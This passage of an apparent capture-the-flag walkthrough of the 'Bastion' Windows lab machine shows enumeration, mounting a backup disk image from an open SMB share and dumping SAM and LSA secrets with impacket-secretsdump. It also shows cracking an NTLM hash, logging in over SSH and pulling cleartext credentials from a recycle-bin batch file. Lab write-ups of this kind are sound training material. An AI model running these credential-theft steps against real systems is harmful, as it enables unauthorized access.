thXLHM96BeKL0ER2 </span></span><span class="line"><span class="cl">Peter : 3RTTT5zNt2 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.134 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">127</span> OpenSSH for_Windows_7.9 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3 </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds syn-ack ttl <span class="m">127</span> Windows Server <span class="m">2016</span> Standard <span class="m">14393</span> microsoft-ds </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">47001/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">49664/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49665/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49666/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49668/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49669/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49670/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2025-02-27T22:08:39 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: 2025-02-27T22:04:13 </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 3:1:1: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled but not required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb-os-discovery: </span></span><span class="line"><span class="cl"><span class="p">|</span> OS: Windows Server <span class="m">2016</span> Standard <span class="m">14393</span> <span class="o">(</span>Windows Server <span class="m">2016</span> Standard 6.3<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Computer name: Bastion </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS computer name: BASTION<span class="se">\x</span><span class="m">00</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Workgroup: WORKGROUP<span class="se">\x</span><span class="m">00</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ System time: 2025-02-27T23:08:38+01:00 </span></span><span class="line"><span class="cl"><span class="p">|</span> smb-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> account_used: guest </span></span><span class="line"><span class="cl"><span class="p">|</span> authentication_level: user </span></span><span class="line"><span class="cl"><span class="p">|</span> challenge_response: supported </span></span><span class="line"><span class="cl"><span class="p">|</span>_ message_signing: disabled <span class="o">(</span>dangerous, but default<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: mean: -19m59s, deviation: 34m38s, median: 0s </span></span><span class="line"><span class="cl"><span class="p">|</span> p2p-conficker: </span></span><span class="line"><span class="cl"><span class="p">|</span> Checking <span class="k">for</span> Conficker.C or higher... </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">1</span> <span class="o">(</span>port 26941/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Couldn<span class="s1">&#39;t connect) </span></span></span><span class="line"><span class="cl"><span class="s1">| Check 2 (port 51775/tcp): CLEAN (Couldn&#39;</span>t connect<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">3</span> <span class="o">(</span>port 18741/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Failed to receive data<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">4</span> <span class="o">(</span>port 15523/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 0/4 checks are positive: Host is CLEAN or ports are blocked </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb-backups-share">SMB &ldquo;backups&rdquo; share </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ smbclient --no-pass -L //10.10.10.134 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> Backups Disk </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl">Reconnecting with SMB1 <span class="k">for</span> workgroup listing. </span></span><span class="line"><span class="cl">do_connect: Connection to 10.10.10.134 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span> </span></span><span class="line"><span class="cl">Unable to connect with SMB1 -- no workgroup available </span></span></code></pre></td></tr></table> </div> </div><h3 id="mount-backup-windows-disk-vdb">Mount backup windows disk VDB </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">guestmount -a ./9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/vhd_mount </span></span></code></pre></td></tr></table> </div> </div><h3 id="retrieve-hashes-from-windows-files">Retrieve hashes from Windows files </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>root㉿kali<span class="o">)</span>-<span class="o">[</span>/home/kali/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─# cp /mnt/vhd_mount/Windows/System32/config/SAM . </span></span><span class="line"><span class="cl">cp /mnt/vhd_mount/Windows/System32/config/SYSTEM . </span></span><span class="line"><span class="cl">cp /mnt/vhd_mount/Windows/System32/config/SECURITY . </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>root㉿kali<span class="o">)</span>-<span class="o">[</span>/home/kali/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─# ls </span></span><span class="line"><span class="cl">SAM SECURITY SYSTEM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>root㉿kali<span class="o">)</span>-<span class="o">[</span>/home/kali/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─# impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping <span class="nb">local</span> SAM hashes <span class="o">(</span>uid:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping cached domain logon information <span class="o">(</span>domain/username:hash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping LSA Secrets </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DefaultPassword </span></span><span class="line"><span class="cl"><span class="o">(</span>Unknown User<span class="o">)</span>:bureaulampje </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DPAPI_SYSTEM </span></span><span class="line"><span class="cl">dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6 </span></span><span class="line"><span class="cl">dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span></code></pre></td></tr></table> </div> </div><h3 id="hashcat-bruteforce">Hashcat bruteforce </h3><p>On a la confirmation que le mot de passe est bien: bureaulampje</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hashcat -m <span class="m">1000</span> hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">26112010952d963c8dc4217daec986d9:bureaulampje </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-l4mpje">SSH L4mpje </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh L4mpje@10.10.10.134 </span></span><span class="line"><span class="cl">Password: bureaulampje </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.14393<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2016</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">l4mpje@BASTION C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje&gt;whoami </span></span><span class="line"><span class="cl">bastion<span class="se">\l</span>4mpje </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">l4mpje@BASTION C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje&gt;type Desktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">1018.....3717 </span></span></code></pre></td></tr></table> </div> </div><h3 id="recycle-bin---peter-usernamepass">Recycle Bin - Peter username/pass </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; dir -ah </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a-hs- 22-2-2019 13:50 <span class="m">129</span> desktop.ini </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat .<span class="se">\d</span>esktop.ini </span></span><span class="line"><span class="cl"><span class="o">[</span>.ShellClassInfo<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">CLSID</span><span class="o">={</span>645FF040-5081-101B-9F08-00AA002F954E<span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="nv">LocalizedResourceName</span><span class="o">=</span>@%SystemRoot%<span class="se">\s</span>ystem32<span class="se">\s</span>hell32.dll,-8964 </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; Get-ChildItem </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">214</span> <span class="nv">$I1MMX2E</span>.txt </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">218</span> <span class="nv">$INTSJCP</span>.bat </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:54 <span class="m">67</span> <span class="nv">$R1MMX2E</span>.txt </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">58</span> <span class="nv">$RNTSJCP</span>.bat </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; Get-ChildItem -Force </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">214</span> <span class="nv">$I1MMX2E</span>.txt </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">218</span> <span class="nv">$INTSJCP</span>.bat </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:54 <span class="m">67</span> <span class="nv">$R1MMX2E</span>.txt </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">58</span> <span class="nv">$RNTSJCP</span>.bat </span></span><span class="line"><span class="cl">-a-hs- 22-2-2019 13:50 <span class="m">129</span> desktop.ini </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$RNTSJCP.bat&#39;</span> </span></span><span class="line"><span class="cl">NET USE Z: <span class="s2">&#34;\\192.168.1.74\Backups&#34;</span> /user:Peter 3RTTT5zNt2 </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; date </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">maandag <span class="m">3</span> maart <span class="m">2025</span> 00:05:57 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$I1MMX2E.txt&#39;</span> </span></span><span class="line"><span class="cl"> C P9c ®ÊÔ<span class="o">]]</span> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl">S t a r t M e n u <span class="se">\ </span>P r o g r a m s <span class="se">\ </span>S t a r t u p <span class="se">\ </span>L <span class="m">4</span> m p j e . b a t . t x t </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$INTSJCP.bat&#39;</span> </span></span><span class="line"><span class="cl"> : </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> ®ÊÔ_ C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ 